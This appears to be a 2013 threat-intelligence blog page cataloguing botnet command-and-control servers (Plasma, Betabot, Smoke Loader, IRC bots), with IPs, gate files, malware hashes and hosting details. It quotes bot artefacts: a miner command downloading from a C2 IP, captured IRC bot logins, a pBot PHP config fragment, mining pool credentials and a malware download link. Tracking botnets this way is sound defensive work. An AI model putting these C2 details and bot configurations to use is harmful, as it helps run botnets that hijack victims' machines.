Month: December 2013

illuminati.sx (Plasma http botnet hosted by worldstream.nl)

Resolved illuminati.sx to 109.236.80.74 Server:  illuminati.sx Gate file:  /http/gate.php This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed. Hosting info: http://whois.domaintools.com/109.236.80.74 Bitcoin mining info: miner.start http://109.236.80.74/miner/CPUMiner.files *-a

boot.sx (Betabot http botnet hosted by worldstream.nl)

Resolved boot.sx to 109.236.80.74 Server:  boot.sx Gate file:  /g4sg/order.php Alternate domain: illuminati.sx This betabot is quite interesting due to the bizarre crypter it uses. The crypter starts with a Winrar SFX archive. This dumps it’s contents in the users temp folder and starts the next layer, a vbs script. The vbs script runs a AutoIT

fapncam.com (betabot hosted by Digitalocean.com)

Resolved fapncam.com to 192.81.216.12 Server:  fapncam.com Gate file:  /beta/order.php Alternate domains: update-silo.comproxypool.infofrizzcams.com Hosting infos: http://whois.domaintools.com/192.81.216.12 Related md5 (Download sample from Malwr.com) Betabot: 52435233bd228dfffc2a2c7e001f66c8

gd.derpcity.ru(godscan botnet hosted in France Roubaix Ovh Systems )

Found by AliSs Server: 37.59.53.162:6667 PASS weed >> PASS weed>> NICK [NeW|00|USA|xP|HOME|5035]>> NICK [NeW|00|USA|xP|HOME|5035]>> USER varun * 0 :HOME>> PING :1389B8E6>> PONG 1389B8E6<< PRIVMSG [NeW|00|USA|xP|HOME|5035] :x01VERSIONx01<< 001 [NeW|00|USA|xP|HOME|5035] :<< 002 [NeW|00|USA|xP|HOME|5035] :<< 003 [NeW|00|USA|xP|HOME|5035] :<< 004 [NeW|00|USA|xP|HOME|5035] :<< 005 [NeW|00|USA|xP|HOME|5035] :<< 005 [NeW|00|USA|xP|HOME|5035] :<< 005 [NeW|00|USA|xP|HOME|5035] :<< 375 [NeW|00|USA|xP|HOME|5035] :/MOTD<< 372 [NeW|00|USA|xP|HOME|5035] :- 5/11/2013 17:10<<

bot.blackunix.us(Linux bots hosted in France Roubaix Ovh Systems)

Found by Yewnix. Resolved : [bot.blackunix.us] To [94.23.89.246]Resolved : [bot.blackunix.us] To [217.29.115.1]Resolved : [bot.blackunix.us] To [91.151.85.31]Resolved : [bot.blackunix.us] To [59.167.240.231]Resolved : [bot.blackunix.us] To [58.180.42.200]Resolved : [bot.blackunix.us] To [64.31.27.18] class pBot { var $config = array(“server”=>”bot.blackunix.us”, “port”=>”20”, “pass”=>””, “prefix”=>”Blood”, “maxrand”=>”15”, “key”=>”none”, “chan”=>”#metri”, “modes”=>”+ps”, “chan2″=>”#metri”, “password”=>”crack”, “trigger”=>”.”, “hostauth”=>”bogel.us” // * for any hostname (remember: /setvhost pasukan.ddos.reload-x.us) Hosting

keshmoney.biz(irc botnet hosted in France Roubaix Ovh Systems)

Found by AliSs Server: keshmoney.biz:6667 Channel: #all,#x00 password 777.#boss Bitcoin Miner: hxxp://knal.wut.re:8332 -u bram226_1 Hosted in this link: hxxp://noinei90.sommadue.it/Built.exe Sample here Hosting infos: http://whois.domaintools.com/37.59.53.162

meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)

Resolved meziamussucemaqueue.su to 124.248.205.104 Server:  meziamussucemaqueue.su Gate file:  /phpmiadmin/order.php Alternate domain:  umbxd15896.su Bitcoin mining info: -o http://ypool.net:8080 -u Teolous.PTS_1 -p x  Hosting info: http://whois.domaintools.com/124.248.205.104 Related md5s (Download sample from malwr.com) betabot: 670fa0a15754e1d67810eea73e890dad Bitcoin miner: e1aed5a5d729d37efca73602d8bc66e9 Bitcoin miner 2:  a92403926113dd4b3a4d3e4c48eace66 EDIT: new mining info stratum+tcp://pool.d2.cc:3335 -u Hanito.bot -p 3fcua4 

frineon.su (Smoke loader hosted by fastflux botnet)

Server:  frineon.su Gate file:  /forum/index.php Hosting info: ;; QUESTION SECTION: ;frineon.su. IN A ;; ANSWER SECTION: frineon.su. 150 IN A 91.188.52.67 frineon.su. 150 IN A 212.92.228.65 frineon.su. 150 IN A 109.200.244.121 frineon.su. 150 IN A 76.66.174.231 frineon.su. 150 IN A 98.218.49.187 frineon.su. 150 IN A 72.185.70.143 frineon.su. 150 IN A 72.185.199.204 frineon.su. 150 IN A